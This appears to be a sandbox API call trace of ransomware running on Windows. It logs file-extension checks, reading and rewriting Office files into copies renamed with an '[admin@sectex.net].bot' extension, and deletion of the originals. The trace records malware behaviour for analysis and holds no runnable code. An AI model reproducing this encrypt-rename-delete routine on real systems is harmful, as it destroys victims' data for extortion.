	[0144.458] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0144.458] lstrlenW (lpString=".docx") returned 5
	[0144.458] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0144.458] lstrlenW (lpString=".pdf") returned 4
	[0144.458] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0144.458] lstrlenW (lpString=".xls") returned 4
	[0144.458] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0144.458] lstrlenW (lpString=".xlsx") returned 5
	[0144.458] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0144.458] lstrlenW (lpString=".ppt") returned 4
	[0144.458] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0144.458] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_F_COL.HXK") returned 67
	[0144.458] lstrlenW (lpString=".zip") returned 4
	[0144.458] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0144.458] lstrlenW (lpString=".rar") returned 4
	[0144.458] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0144.458] lstrlenW (lpString=".bz2") returned 4
	[0144.458] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0144.458] lstrlenW (lpString=".7z") returned 3
	[0144.458] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0144.458] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_F_COL.HXK") returned 67
	[0144.458] lstrlenW (lpString=".dbf") returned 4
	[0144.458] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0144.458] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_F_COL.HXK") returned 67
	[0144.458] lstrlenW (lpString=".1cd") returned 4
	[0144.459] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0144.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_F_COL.HXK") returned 67
	[0144.459] lstrlenW (lpString=".jpg") returned 4
	[0144.459] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0144.459] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0144.459] lstrlenW (lpString="EXCEL.DEV_K_COL.HXK") returned 19
	[0144.459] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_k_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0144.459] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=113) returned 1
	[0144.459] CloseHandle (hObject=0x384) returned 1
	[0144.459] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_k_col.hxk")) returned 0x20
	[0144.459] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_k_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.460] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0144.460] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.460] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.460] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_k_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0144.460] GetLastError () returned 0x0
	[0144.460] ReadFile (in: hFile=0x384, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x71, lpOverlapped=0x0) returned 1
	[0144.461] WriteFile (in: hFile=0x3cc, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x80, lpOverlapped=0x0) returned 1
	[0144.462] ReadFile (in: hFile=0x384, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.462] WriteFile (in: hFile=0x3cc, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xfa, lpOverlapped=0x0) returned 1
	[0144.462] SetEndOfFile (hFile=0x3cc) returned 1
	[0144.462] CloseHandle (hObject=0x3cc) returned 1
	[0144.462] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.463] SetEndOfFile (hFile=0x384) returned 1
	[0144.465] CloseHandle (hObject=0x384) returned 1
	[0144.465] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.465] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_k_col.hxk")) returned 1
	[0144.466] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_K_COL.HXK") returned 67
	[0144.466] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_K_COL.HXK") returned 67
	[0144.466] lstrlenW (lpString=".doc") returned 4
	[0144.466] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0144.466] lstrlenW (lpString=".docx") returned 5
	[0144.466] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0144.466] lstrlenW (lpString=".pdf") returned 4
	[0144.466] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0144.466] lstrlenW (lpString=".xls") returned 4
	[0144.466] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0144.466] lstrlenW (lpString=".xlsx") returned 5
	[0144.466] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0144.466] lstrlenW (lpString=".ppt") returned 4
	[0144.466] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0144.466] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_K_COL.HXK") returned 67
	[0144.466] lstrlenW (lpString=".zip") returned 4
	[0144.466] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0144.466] lstrlenW (lpString=".rar") returned 4
	[0144.466] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0144.466] lstrlenW (lpString=".bz2") returned 4
	[0144.466] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0144.466] lstrlenW (lpString=".7z") returned 3
	[0144.466] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0144.466] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_K_COL.HXK") returned 67
	[0144.467] lstrlenW (lpString=".dbf") returned 4
	[0144.467] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0144.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_K_COL.HXK") returned 67
	[0144.467] lstrlenW (lpString=".1cd") returned 4
	[0144.467] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0144.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_K_COL.HXK") returned 67
	[0144.467] lstrlenW (lpString=".jpg") returned 4
	[0144.467] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0144.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_K_COL.HXK") returned 67
	[0144.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_K_COL.HXK") returned 67
	[0144.467] lstrlenW (lpString=".doc") returned 4
	[0144.467] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0144.467] lstrlenW (lpString=".docx") returned 5
	[0144.467] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0144.467] lstrlenW (lpString=".pdf") returned 4
	[0144.467] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0144.467] lstrlenW (lpString=".xls") returned 4
	[0144.467] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0144.467] lstrlenW (lpString=".xlsx") returned 5
	[0144.467] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0144.467] lstrlenW (lpString=".ppt") returned 4
	[0144.467] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0144.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_K_COL.HXK") returned 67
	[0144.467] lstrlenW (lpString=".zip") returned 4
	[0144.467] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0144.467] lstrlenW (lpString=".rar") returned 4
	[0144.467] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0144.467] lstrlenW (lpString=".bz2") returned 4
	[0144.467] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0144.467] lstrlenW (lpString=".7z") returned 3
	[0144.467] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0144.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_K_COL.HXK") returned 67
	[0144.467] lstrlenW (lpString=".dbf") returned 4
	[0144.468] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0144.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_K_COL.HXK") returned 67
	[0144.468] lstrlenW (lpString=".1cd") returned 4
	[0144.468] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0144.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_K_COL.HXK") returned 67
	[0144.468] lstrlenW (lpString=".jpg") returned 4
	[0144.468] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0144.468] lstrcmpiW (lpString1=".HXS", lpString2=".bot") returned 1
	[0144.468] lstrlenW (lpString="EXCEL.HXS") returned 9
	[0144.468] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.hxs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0144.468] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=7827686) returned 1
	[0144.468] CloseHandle (hObject=0x384) returned 1
	[0144.468] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.hxs")) returned 0x20
	[0144.469] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.469] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0144.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.HXS") returned 57
	[0144.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.HXS") returned 57
	[0144.469] lstrlenW (lpString=".doc") returned 4
	[0144.469] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0144.469] lstrlenW (lpString=".docx") returned 5
	[0144.469] lstrcmpiW (lpString1=".docx", lpString2="L.HXS") returned -1
	[0144.469] lstrlenW (lpString=".pdf") returned 4
	[0144.469] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0144.469] lstrlenW (lpString=".xls") returned 4
	[0144.469] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0144.469] lstrlenW (lpString=".xlsx") returned 5
	[0144.469] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXS") returned -1
	[0144.469] lstrlenW (lpString=".ppt") returned 4
	[0144.469] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0144.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.HXS") returned 57
	[0144.469] lstrlenW (lpString=".zip") returned 4
	[0144.469] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0144.469] lstrlenW (lpString=".rar") returned 4
	[0144.469] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0144.469] lstrlenW (lpString=".bz2") returned 4
	[0144.469] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0144.469] lstrlenW (lpString=".7z") returned 3
	[0144.469] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0144.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.HXS") returned 57
	[0144.470] lstrlenW (lpString=".dbf") returned 4
	[0144.470] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0144.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.HXS") returned 57
	[0144.470] lstrlenW (lpString=".1cd") returned 4
	[0144.470] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0144.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.HXS") returned 57
	[0144.470] lstrlenW (lpString=".jpg") returned 4
	[0144.470] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0144.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.HXS") returned 57
	[0144.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.HXS") returned 57
	[0144.470] lstrlenW (lpString=".doc") returned 4
	[0144.470] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0144.470] lstrlenW (lpString=".docx") returned 5
	[0144.470] lstrcmpiW (lpString1=".docx", lpString2="L.HXS") returned -1
	[0144.470] lstrlenW (lpString=".pdf") returned 4
	[0144.470] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0144.470] lstrlenW (lpString=".xls") returned 4
	[0144.470] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0144.470] lstrlenW (lpString=".xlsx") returned 5
	[0144.470] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXS") returned -1
	[0144.470] lstrlenW (lpString=".ppt") returned 4
	[0144.470] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0144.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.HXS") returned 57
	[0144.470] lstrlenW (lpString=".zip") returned 4
	[0144.470] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0144.470] lstrlenW (lpString=".rar") returned 4
	[0144.470] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0144.470] lstrlenW (lpString=".bz2") returned 4
	[0144.470] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0144.470] lstrlenW (lpString=".7z") returned 3
	[0144.470] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0144.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.HXS") returned 57
	[0144.470] lstrlenW (lpString=".dbf") returned 4
	[0144.471] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0144.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.HXS") returned 57
	[0144.471] lstrlenW (lpString=".1cd") returned 4
	[0144.471] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0144.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.HXS") returned 57
	[0144.471] lstrlenW (lpString=".jpg") returned 4
	[0144.471] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0144.471] lstrcmpiW (lpString1=".HXC", lpString2=".bot") returned 1
	[0144.471] lstrlenW (lpString="EXCEL_COL.HXC") returned 13
	[0144.471] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_col.hxc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0144.471] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=621) returned 1
	[0144.471] CloseHandle (hObject=0x384) returned 1
	[0144.471] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_col.hxc")) returned 0x20
	[0144.472] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_col.hxc.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.472] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0144.472] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.472] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.472] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_col.hxc.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0144.472] GetLastError () returned 0x0
	[0144.472] ReadFile (in: hFile=0x384, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x26d, lpOverlapped=0x0) returned 1
	[0144.475] WriteFile (in: hFile=0x3cc, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x270, lpOverlapped=0x0) returned 1
	[0144.476] ReadFile (in: hFile=0x384, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.476] WriteFile (in: hFile=0x3cc, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xee, lpOverlapped=0x0) returned 1
	[0144.476] SetEndOfFile (hFile=0x3cc) returned 1
	[0144.476] CloseHandle (hObject=0x3cc) returned 1
	[0144.476] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.476] SetEndOfFile (hFile=0x384) returned 1
	[0144.478] CloseHandle (hObject=0x384) returned 1
	[0144.696] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXC.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.911] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_col.hxc")) returned 1
	[0144.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXC") returned 61
	[0144.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXC") returned 61
	[0144.934] lstrlenW (lpString=".doc") returned 4
	[0144.934] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0144.934] lstrlenW (lpString=".docx") returned 5
	[0144.934] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0144.934] lstrlenW (lpString=".pdf") returned 4
	[0144.934] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0144.934] lstrlenW (lpString=".xls") returned 4
	[0144.934] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0144.934] lstrlenW (lpString=".xlsx") returned 5
	[0144.935] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0144.935] lstrlenW (lpString=".ppt") returned 4
	[0144.935] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0144.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXC") returned 61
	[0144.935] lstrlenW (lpString=".zip") returned 4
	[0144.935] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0144.935] lstrlenW (lpString=".rar") returned 4
	[0144.935] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0144.935] lstrlenW (lpString=".bz2") returned 4
	[0144.935] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0144.935] lstrlenW (lpString=".7z") returned 3
	[0144.935] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0144.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXC") returned 61
	[0144.935] lstrlenW (lpString=".dbf") returned 4
	[0144.935] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0144.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXC") returned 61
	[0144.935] lstrlenW (lpString=".1cd") returned 4
	[0144.935] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0144.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXC") returned 61
	[0144.935] lstrlenW (lpString=".jpg") returned 4
	[0144.935] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0144.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXC") returned 61
	[0144.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXC") returned 61
	[0144.935] lstrlenW (lpString=".doc") returned 4
	[0144.935] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0144.935] lstrlenW (lpString=".docx") returned 5
	[0144.935] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0144.935] lstrlenW (lpString=".pdf") returned 4
	[0144.935] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0144.935] lstrlenW (lpString=".xls") returned 4
	[0144.935] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0144.935] lstrlenW (lpString=".xlsx") returned 5
	[0144.935] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0144.936] lstrlenW (lpString=".ppt") returned 4
	[0144.936] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0144.936] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXC") returned 61
	[0144.936] lstrlenW (lpString=".zip") returned 4
	[0144.936] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0144.936] lstrlenW (lpString=".rar") returned 4
	[0144.936] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0144.936] lstrlenW (lpString=".bz2") returned 4
	[0144.936] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0144.936] lstrlenW (lpString=".7z") returned 3
	[0144.936] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0144.936] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXC") returned 61
	[0144.936] lstrlenW (lpString=".dbf") returned 4
	[0144.936] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0144.936] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXC") returned 61
	[0144.936] lstrlenW (lpString=".1cd") returned 4
	[0144.936] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0144.936] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXC") returned 61
	[0144.936] lstrlenW (lpString=".jpg") returned 4
	[0144.936] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0144.936] lstrcmpiW (lpString1=".VRD", lpString2=".bot") returned 1
	[0144.936] lstrlenW (lpString="GANTT.VRD") returned 9
	[0144.936] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\gantt.vrd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0144.965] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=2043) returned 1
	[0144.965] CloseHandle (hObject=0x3bc) returned 1
	[0144.965] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\gantt.vrd")) returned 0x20
	[0145.039] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\gantt.vrd.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
